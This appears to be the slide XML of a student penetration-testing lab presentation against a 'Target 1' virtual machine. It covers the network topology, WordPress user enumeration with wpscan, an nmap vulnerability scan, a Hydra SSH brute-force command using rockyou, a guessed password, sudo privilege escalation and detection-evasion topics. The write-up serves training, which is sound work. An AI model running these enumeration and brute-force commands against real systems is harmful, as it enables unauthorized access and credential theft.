            <a:pPr indent="-298450" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CPU usage greater than equal to 0.5 (50%)</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2795250"/>
            <a:ext cx="66564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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigating Detection</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Dorking could be used to find company employees (users), email addresses, vulnerable files and servers and even possibly passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3487950"/>
            <a:ext cx="3549924" cy="1655550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Google Shape;349;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10370" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4858000" y="3487950"/>
            <a:ext cx="4286000" cy="165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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735925" y="1194025"/>
            <a:ext cx="5143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solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>The End</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870600" y="1994425"/>
            <a:ext cx="48996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Austin Baxter, Ben Horsley, Lauren Williams, Steph Hoffman, &amp; Tom Kuhn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23450" y="1661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2298051" y="16212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Network Topology &amp; Critical Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="CACACA"/>
              </a:solidFill>
              <a:latin typeface="Average"/>
              <a:ea typeface="Average"/>
              <a:cs typeface="Average"/>
              <a:sym typeface="Average"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466700" y="65330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This presentation contains the following resources:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307200" y="21645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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307200" y="27505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Methods Used to Avoid Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521300" y="155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01</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521300" y="221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02</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521300" y="2875375"/>
            <a:ext cx="689100" cy="325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 Topology &amp; Critical Vulnerabilities </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p1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assess the network topology used in this engagement followed by the critical vulnerabilities found on the Target 1 Virtual Machine when attacked using a Kali Linux Virtual Machine.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 Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201925" y="1092400"/>
            <a:ext cx="5706600" cy="379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110225" y="1092375"/>
            <a:ext cx="1857300" cy="37911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lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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Address Range:</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192.168.1.0/24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Netmask:</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Gateway: 192.168.1.1</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200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>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192.168.1.90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Debian Kali 5.4.0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Kali</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IPv4:192.168.1.110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Debian GNU/Linux 8</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Target 1</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192.168.1.105</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Ubuntu 18.04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Capstone</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IPv4: 192.168.1.100</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OS: Ubuntu 18.04</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2900"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hostname: ELK</a:t>
            </a:r>
            <a:endParaRPr sz="300">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Lato"/>
              <a:ea typeface="Lato"/>
              <a:cs typeface="Lato"/>
              <a:sym typeface="Lato"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="255" name="Google Shape;255;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201925" y="1307850"/>
            <a:ext cx="5608100" cy="349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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="672300" y="1454500"/>
            <a:ext cx="7942200" cy="365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Critical Vulnerabilities on Target 1:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="262" name="Google Shape;262;p21"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="672288" y="1454500"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{2519487B-9B7C-4798-8919-BC28DAC5CFC5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2647400"/>
                <a:gridCol w="2647400"/>
                <a:gridCol w="2647400"/>
              </a:tblGrid>
              <a:tr h="396200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Vulnerability</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chemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Description</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GB">
                          <a:solidFill>
                            <a:schemeClr val="accent1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:schemeClr val="accent1"/>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77200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1300"/>
                        <a:t>WordPress User Enumeration</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Utilized enumeration to gather user information for the web server</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attacker to gather usernames to gain access to the web server</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75325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1300"/>
                        <a:t>Weak Passwords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Was able to find passwords using John the Ripper and simple guessing to gain access to user logins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attacker to gain access to protected web directories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77200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1300">
                          <a:highlight>
                            <a:schemeClr val="lt2"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Unsalted User Password Hash</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An unsalted user password hash makes it easier for a malicious actor to crack a users password.</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Allows attackers to unhash passwords for easy password cracking</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36425">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1300"/>
                        <a:t>Misconfiguration of User Privileges</a:t>
                      </a:r>
                      <a:endParaRPr sz="1300">
                        <a:highlight>
                          <a:schemeClr val="lt2"/>
                        </a:high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Used Stevens sudo access to escalate from Steven to root</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GB" sz="1300"/>
                        <a:t>Allowed privilege escalation to root</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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269075" y="50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Screenshots of Critical Vulnerabilities:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="269" name="Google Shape;269;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2416550"/>
            <a:ext cx="4572000" cy="1293000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3713050" y="771600"/>
            <a:ext cx="5430950" cy="1644950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;271;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462250" y="1386825"/>
            <a:ext cx="28407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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Command ran to find vulnerabilities: nmap --script vulners -sV 192.168.1.110</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://nvd.nist.gov/vuln/search</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="272" name="Google Shape;272;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2498475"/>
            <a:ext cx="4572000" cy="11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Exploits Used</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p23"/>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This section will demonstrate the methods taken to execute the exploits on the Target 1 Virtual Machine.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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058975" y="92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WordPress Enumeration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1503075"/>
            <a:ext cx="479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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr b="1"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How did you exploit the vulnerability? </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Used:</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="dk2"/>
                </a:highlight>
              </a:rPr>
              <a:t>wpscan --url http://192.168.1.110/wordpress --enumerate u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to enumerate the users on the web server.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gained critical information such as user information in order to SSH into server. </a:t>
            </a:r>
            <a:endParaRPr sz="12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285" name="Google Shape;285;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4605725" y="1619500"/>
            <a:ext cx="4504675" cy="163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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1058975" y="924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Exploitation: Weak Passwords</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="Google Shape;291;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1503075"/>
            <a:ext cx="4203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accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr b="1"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How did you exploit the vulnerability? </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Used Manual Brute Force to guess the password</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Username: Michael</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Password: michael</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NOTE: Use of Hydra tool can be used to brute force the password if it can’t be guessed easily.</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Command syntax:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.110</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What did the exploit achieve? </a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Granted SSH access to Michael’s account to gather the MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t> password in the wp-config.php file which was found in the wordpress folder, which was found in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>html folder.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="292" name="Google Shape;292;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1587125"/>
            <a:ext cx="4571975" cy="923400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="293" name="Google Shape;293;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
